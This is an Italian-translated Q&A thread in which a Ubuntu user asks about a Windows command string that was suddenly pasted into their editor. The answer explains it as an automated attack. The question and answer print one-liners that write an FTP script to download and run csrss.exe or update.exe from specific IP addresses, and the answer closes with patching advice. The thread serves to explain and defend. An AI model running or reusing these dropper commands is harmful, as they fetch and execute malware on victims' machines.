Ho bisogno di aiuto per capire il significato di un potenziale script di dirottamento

1

Sto usando Ubuntu 13.04. È successo qualcosa di veramente strano Stavo scrivendo i miei compiti per un corso di Ruby. Avevo Sublime Text 2 (un editor di testo come Notepad, Notepad ++, Textmate ecc.) Aperto e stava lavorando su un certo codice. Stavo navigando sul web anche con l'ultima versione di Chrome. Ad un certo punto ho cambiato windows da Chrome a Sublime Text 2. Stavo per scrivere qualcosa, quando improvvisamente il seguente script è stato "incollato" nel mio documento:

eq&echo user 20858 17334 >> eq &echo get csrss.exe >> eq &echo quit >> eq &ftp -n -s:eq &csrss.exe &del eq

È stato incollato in più parti in successioni molto veloci. Era come se qualcuno avesse il controllo sul mio computer e stava incollando questo. Sono sicuro di non averlo incollato da solo (nel caso qualcuno lo ritenga in qualche modo copiato negli appunti per essere incollato la prossima volta che premo Ctrl + V). Quindi le mie domande - che cosa significa questo script, che tipo di attacco è stato e come posso proteggermi da questo in futuro?

    
posta Alex Popov 30.10.2013 - 22:01
fonte

1 risposta

2

Beh, sembra che ci siano alcuni frammenti di codice simili sul web. Il più simile al tuo è stato trovato su un sito di tipo Pastebin che è stato rimosso (ma Google Cache era ancora attivo):

cmd /c echo open 201.120.57.137 21 >> ik &echo user oracle oracle >> ik &echo binary >> ik &echo get update.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &update.exe &exit &echo open 95.125.139.200 11104 >> eq&echo user 1297 20204 >> eq &echo get csrss.exe >> eq &echo quit >> eq &ftp -n -s:eq &csrss.exe &del eq

Sebbene il codice sia un po 'diverso, c'è analisi abbastanza buona da parte del veterano membro del forum Ars Technica Syonyk qui:

tl;dr version: "Don't run VNC on a public IP with anything but a very, very strong password. Better yet, don't run it on a public port (bind it to localhost), and SSH/VPN in to access it."

A friend of mine has a Mac, and her system has been a bit strange lately.

Specifically, it's been acting suspiciously like it's been rooted - which, being a fellow Mac user, concerns me greatly. She's had random text show up in IM windows, but apparently was away from the computer and never investigated.

Tonight, she had something show up in a terminal window while she was away, and IM'd it to me. I have remote (root) access to her system (she's aware of this and set up the account for me), and was bored, so I decided to investigate. ... My first thought was that this had to be an automated program. A human won't try to enter Win32 specific commands on a Mac. It appears that the program sent keycodes that were not translated properly to the Mac, which would be consistent with an automated program.

In genere penserei che:

  • Questo è un attacco automatico. csrss.exe è un sistema Windows eseguibile e qualcuno che si rivolge specificamente al tuo sistema Linux non proverei a invocarlo.

  • Questo tipo di attacco (passando una sequenza di comandi all'utente appunti nella speranza che verrà eseguito inavvertitamente in a prompt dei comandi) non è nuovo - il post di Ars Technica è del 2002, oltre un decennio fa.

Quindi suggerisco che il tuo computer non possa essere compromesso (contrariamente all'opinione di Ars Technica sopra):

  1. Sembra che tu non abbia commesso gli errori descritti. Potrebbe "solo" essere quello a funzionalità del browser (o exploit) ha permesso l'accesso a un sito malevolo i tuoi appunti.

  2. Se effettivamente il tuo computer è stato compromesso, l'aggressore lo farebbe non ho bisogno di usare questo metodo - egli interagirebbe solo con a shell in remoto.

La soluzione per te sarebbe probabilmente un'attesa vigile, come in caso di allerta per ogni ulteriore stranezza e, se visto, rivalutare.

O se un'azione è stata ritenuta prudente, probabilmente i migliori sarebbero i soliti sospetti: assicurati che il tuo browser, i plug-in del browser e il tuo sistema operativo siano aggiornati con le patch di sicurezza.

    
risposta data 30.10.2013 - 22:22
fonte

Leggi altre domande sui tag